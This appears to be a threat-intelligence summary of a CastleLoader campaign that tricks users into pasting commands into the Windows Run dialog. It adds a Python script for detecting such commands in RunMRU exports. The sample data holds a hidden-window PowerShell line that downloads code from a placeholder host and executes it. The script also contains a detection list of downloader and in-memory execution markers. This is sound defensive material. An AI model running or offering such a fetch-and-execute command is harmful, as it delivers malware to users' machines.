Cybersecurity researchers have identified a new campaign in which a Python-based delivery chain deploys the CastleLoader malware family using ClickFix social engineering prompts. The attack relies on memory-only payload execution to avoid detection and uses PEB walking to resolve Windows APIs without importing them. #CastleLoader #ClickFix
Key points
- A new malware campaign uses a Python loader to deploy CastleLoader without disk footprint.
- ClickFix social engineering prompts convince users to paste and run "verification" commands in the Windows Run dialog.
- The malware uses in-memory execution and PEB walking to evade detection and resolve APIs.
- Network markers such as a GoogleBot user agent and shared staging paths link this activity to previous CastleLoader campaigns.
- Organizations are advised to educate users, restrict script execution, and monitor for unusual activity.
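Because the ClickFix lure depends on the victim typing a command into the Windows Run dialog, one cheap place to look for it is the Run dialog's own history, which Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (each value carries a trailing "\1" and MRUList gives the recency order). The following is an added example written for this summary, not code from the article or from any of the researchers it cites: it takes an already-exported copy of that key (the entries below are constructed, and example.invalid is a reserved test domain) and flags Run commands that launch an interpreter or downloader together with network or obfuscation indicators. The indicator lists are the author's own heuristics, not markers taken from the campaign.

```python
import re

# Constructed RunMRU-style export for the example. Real values are read from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU; each command
# ends with "\1" and MRUList orders the keys from most to least recent.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -c irm http://example.invalid/verify | iex\\1",
    "c": "python -c \"import urllib.request;...\"\\1",
    "d": "\\\\fileserver\\share\\1",
    "MRUList": "cbad",
}

# Interpreters and built-in downloaders a pasted "verification" command would
# typically start. Heuristic list chosen for this example, not campaign IoCs.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|python|pythonw|curl|certutil|bitsadmin)(\.exe)?\b",
    re.I,
)

# Network fetch, in-memory execution and window-hiding markers (heuristic).
NETWORK_OR_OBFUSCATION = re.compile(
    r"(https?://|iwr\b|irm\b|iex\b|invoke-webrequest|invoke-expression|downloadstring"
    r"|-enc\w*\s|frombase64string|urllib|urlopen|-w\s+hidden|-windowstyle\s+hidden)",
    re.I,
)


def strip_mru_suffix(value):
    """Remove the trailing '\\1' that Explorer appends to every RunMRU value."""
    return value[:-2] if value.endswith("\\1") else value


def classify_run_entry(command):
    """Return a finding dict for a suspicious Run command, or None.

    A command is flagged only when it starts an interpreter/downloader AND
    carries at least one network or obfuscation indicator, so plain uses such
    as 'notepad' or 'cmd' are not reported.
    """
    cmd = strip_mru_suffix(command)
    if not INTERPRETERS.search(cmd):
        return None
    indicators = sorted({m.group(1).lower() for m in NETWORK_OR_OBFUSCATION.finditer(cmd)})
    if not indicators:
        return None
    return {"command": cmd, "indicators": indicators}


def scan_runmru(values):
    """Walk the exported key in MRUList order (most recent first) and collect findings."""
    findings = []
    for key in values.get("MRUList", ""):
        raw = values.get(key)
        if raw is None:
            continue
        finding = classify_run_entry(raw)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_runmru(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS RUN COMMAND: {f['command']!r} indicators={f['indicators']}")
```

On a live host the dict would come from winreg (or a registry export gathered during triage); the matching is kept separate from the collection so the same logic can run over exports from many machines offline. The RunMRU key is per user and is only written when the Run dialog is used, so an entry there does not prove execution succeeded, but it is a strong lead to correlate with process-creation telemetry showing explorer.exe spawning the interpreter named in the command.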
Read More: https://www.infosecurity-magazine.com/news/clickfix-rise-castleloader-attacks/